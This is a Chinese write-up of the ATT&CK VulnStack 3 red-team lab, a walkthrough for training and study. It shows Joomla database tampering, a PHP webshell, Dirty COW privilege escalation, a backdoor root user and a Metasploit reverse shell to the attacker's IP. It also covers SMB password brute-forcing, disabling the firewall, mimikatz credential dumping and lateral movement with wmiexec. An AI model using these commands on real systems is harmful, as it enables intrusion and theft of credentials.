ATTCK实战系列(三)
靶机下载地址
漏洞详情
目标:域控中存在一份重要文件。
本次环境为黑盒测试,不提供虚拟机账号密码
环境配置
攻击机kali: 192.168.1.109
web-centos:192.168.1.110
192.168.93.100
Web1-ubantu:192.168.93.120
pc:192.168.93.30
Win2008:192.168.93.20
Windows server 2012:192.168.93.10
外网ip段:192.168.1.0/24 桥接分配即可
内网ip段:192.168.93.0/24 这个下载好靶机开启就行了 这里ip是分配好的
先nmap -sP 扫描网段存活主机
109是攻击机kali 哒ip
初步判断 110就是我们要攻击的靶机了 ^_^
下面进行单独扫描
这里发现开了mysql数据库服务 远程ssh服务连接 web网站
居然有web网站那就去访问ip看看啦
这里发现是joomla CMS ,于是用kali里自带的 joomscan漏洞目录扫描工具
Joomscan -u http://192.168.1.110/
和配置文件 http://192.168.1.110/configuration.php~
提示文件 http://192.168.1.110/robots.txt
在这个文件中声明该网站中不想被robot访问的部分 也会声明可以访问的部分与提示
下面先访问一下robots.txt
发现administrator目录是
这里我们就进去瞅瞅 逼近不可告人的都是秘密
于是发现了用户登录的界面 但是我用弱密码尝试了几下 发现不行
然后就只能另寻蹊径了
然后再访问一下configuration.php~目录
终于皇天不负有心人 让我看到了mysql数据库连接密码 呜哈哈
下面我使用Navicat进行数据库连接
然后对joomla数据库进行添加用户
并在usergroup加入刚才添加的root用户 密码secret
secret加密后:d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199
这里不加密是不成功的
group_id 8 就是超级用户权限
使用刚才添加的用户去登录
然后在里面写上一句话木马使用蚁剑连接 在这里我掉坑了
我一开始认为index.php就在administrator目录下面 然后我连了几下发现不对 于是看到保存文件的提示
提示说index.php 在template/beez3里面 害
害 这里发现禁用命令
但是还是有一点收获的 发现这里是ubuntu内核 而不上web-centos的
说明真正的 web 服务后端在 ubuntu
于是新建一个文件 PHPinfo
的确禁止命令执行操作了
这样就可以使用啦 (^v^)
Ip不一致这不就证实了 后端是ubuntu
然后有去1.110目录里翻了翻
得知账户密码 就去ssh尝试登录一下 然后登录成功了
但是权限不够吖
拿到出网机后想继续横向移动,一般是在跳板机搭建 socks 代理,所以需要将 centos 提权,查看 centos 内核版可以脏牛提权
exp 下载地址: GitHub - FireFart/dirtycow
下载好之后上传到centos里
上传的方式很多用
scp 要上传的文件路径 wwwuser@192.168.1.110:/home/wwwuser 也可以
使用
gcc -pthread dirty.c -o dirty -lcrypt
然后执行./dirty [密码]
这里需要删除原来的 不然无法生成 想换一个密码就把以前的删除了从新生成 即可
查看权限 提权成功!
权限维持添加root用户后门
#创建一个用户名administrator 密码haha 的后门用户
方法一.
拿centos msf上线
use exploit/multi/script/web_deliveryset target 7 # 选择目标系统,不知道的show targets一下set payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.1.109set lport 6666run
把这个复制到 远程登录的centos里执行一下
成功反弹!
方法二.
使用kali生成 payload文件 上传到centos进行提权
开启msf监听端口 然后操作centos 执行上传的shell.elf
设置一下到 192.168.93.0/24网段的路由 设置代理去扫描93.0/24网段
这里扫描出 192.168.93.10 :windows 2012 R2
192.168.93.20 :windows 2008
192.168.93.30 :windows 7
下面使用代理对10\20\30进行 nmap扫描
发现三台主机开放了135、445端口
然后尝试了永恒之蓝 但是没有成功
下面使用smb尝试爆破use auxiliary/scanner/smb/smb_loginset rhosts 192.168.93.30set SMBUser administratorset PASS_FILE /usr/share/wordlists/top1000.txt
run
爆出密码:123qwe!ASD
然后跑了一下20的 密码也是123qwe!ASD
但是10的没有跑出来
wni出现在windows操作系统里 用于管理本地或远程的windows系统
而且wmi攻击windows 系统日志不会记录这些操作,也就是说无日志
wmiexec 执行命令,搜集信息,参考:wmiexec.py 下载地址: https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
这里大家不要迷糊呦
进入python目录然后执行以下命令
git clone https://github.com/CoreSecurity/impacket.git
Cd impacket/
pip install . (.点前面要加两个空格)
如果还出错尝试apt-get install python3-pip
装好之后进入example目录下 执行wmiexec.py 拿到win2008的shell
proxychains python3 wmiexec.py -debug 'administrator:123qwe!ASD@192.168.93.20'
然后在收集一下信息
然后得知域控ip是10
然后关闭一下20防火墙
netsh firewall set opmode mode=disable
开一下3389
尝试远程登录
https://github.com/gentilkiwi/mimikatz 下载地址
这里通过代理是可以登录的 但是上传不了mimikatz
发现test域进程管理员,尝试抓取密码
下面在kali上使用smbclient 连接到windows 2008上传mimikatz
然后 put mimikatz.exe
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log
得到test 域管理员密码 :zxcASDqw123!!
ipc远程连接
是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$连接者可以与目标主机建立一个连接,得到目标主机上的目录结构、用户列表等信息。
利用条件:管理员开启了默认共享 139或445端口开放
得知域名 用户名 密码 也可以 proxychains python3 wmiexec.py -debug 'TEST.ORG/administrator:zxcASDqw123!!@192.168.93.10'
ATTCK实战系列(三)相关推荐
- 【Youtobe trydjango】Django2.2教程和React实战系列三【Django超级管理员和内置内容】
[Youtobe trydjango]Django2.2教程和React实战系列三[Django超级管理员和内置内容] 1. Django数据初始化及超级管理员 2. 用户模块使用 1. Django ...
- java search 不能使用方法_ElasticSearch实战系列三: ElasticSearch的JAVA API使用教程
前言 在上一篇中介绍了ElasticSearch实战系列二: ElasticSearch的DSL语句使用教程---图文详解,本篇文章就来讲解下 ElasticSearch 6.x官方Java API的 ...
- ATTCK实战系列——红队实战(一)
文章目录 环境搭建 渗透测试部分 phpmyadmin 日志 getshell yxcms 前端 XSS 任意文件写入 getshell 任意文件删除 后渗透阶段 域控信息收集 域外信息收集与渗透 3 ...
- 红日ATTCK实战系列(一)
靶机信息 靶机基本描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,完全模拟ATT&CK攻击链路进行搭建 靶机下载地址:http://vulnstack.qiyuanxuetang. ...
- ATTCK实战系列——红队实战(五)
ATT&CK实战系列--红队实战(五) 文章目录 ATT&CK实战系列--红队实战(五) 前言 靶场搭建 网络配置 外网渗透 内网渗透 内网信息收集 msf反弹shell 设置路由 探 ...
- ATTCK实战系列——红队实战(—)
ATT&CK实战系列--红队实战(-) 文章目录 ATT&CK实战系列--红队实战(-) 前言 一.环境搭建 1.1 靶场下载 1.2 网卡配置 二.外网渗透 三.内网渗透 1. 尝试 ...
- 数据治理从理论到实战系列(三)——cdh安装
数据治理从理论到实战系列 提示:数据治理实战需要用到统一版本大数据开源组件,为了避免版本混乱导致的安装使用异常,我们先在这章节插入到了cdh安装 数据治理(三)cdh安装 数据治理从理论到实战系列 前 ...
- [VulnStack] ATTCK实战系列—红队实战(二)
文章目录 0x00 环境搭建 0x01 信息收集 端口探测 目录扫描 0x02 漏洞利用 0x03 内网收集 主机信息搜集 域信息收集 内网漏洞扫描 0x04 横向渗透 MS17-010 PsExec ...
- ATTCK实战系列 —— 红队实战(三)
环境准备 网络拓扑图 外网网段:172.26.239.0/24 内网网段:192.168.93.0/24 主机 外网 内网 Centos 172.26.239.89 192.168.93.100 Ub ...
最新文章
- yarn 切换 设置 镜像 源
- AI助锂电池技术 科学家有望彻底解决电池爆炸
- Vofuria 的 imageTarget 的图片无法显示或者显示为空白
- tcp接口测试工具_【转载】接口测试和性能测试的区别
- android ndk调用出错,由于Android-NDK应用程序的权限问题,为什么fopen在本地方法中失败?...
- 阿里如何做到百万量级硬件故障自愈?
- C语言小项目(画机器猫)
- java中sql语句怎么把开始和结束时间作为参数写sql查询_聊一聊MyBatis 和 SQL 注入间的恩恩怨怨
- equinox_轻松使用Linux Equinox桌面环境
- “不会MySQL,干啥都不行!”高级开发:工作、面试处处都会踩坑!
- JAVA Map类compute方法详解及样例
- 植被覆盖度时空变化规律分析实例
- 阿里云CDN回源host理解
- 生来只为丈量天空,开普勒的传奇一生
- 关于如何去实现百度的自动发帖功能猜想
- Python的特点(优点和缺点)
- 08-Linux账号管理学习
- dnf剑魂buff等级上限_DNF体验服快讯—剑魂加入25开关/25仔变34仔/国庆版本内容前瞻...
- 全国计算机二级算国奖吗,如何区分竞赛证书的等级和含金量?(太多人傻傻分不清国奖、省奖、市奖)...
- 什么是restful,什么是rest风格
热门文章
- 微信小程序2--登录流程与支付流程简写
- 虚拟服务器的lun,我应该为每个服务器都配备存储LUN吗?
- java计算机毕业设计服装批发进销存系统源码+mysql数据库+系统+lw文档+部署
- 最短路径:Dijkstra算法(求单源最短路径)Floyd算法(求各顶点之间最短路径)
- 王者荣耀s18服务器维护中,王者荣耀S18赛季战队cd多久 2020退出战队冷却时间介绍...
- 利用开源工具实现轻量级上网行为审计 来源ispublic com
- iOS开发 --制作圆形的头像(UIImage)
- 华为OD机试 - 密室逃生游戏(Java JS Python)
- python微信群定时发早安_Python每天定时发早安晚安语录
- 李宏毅机器学习[1]-宝可梦CP值预测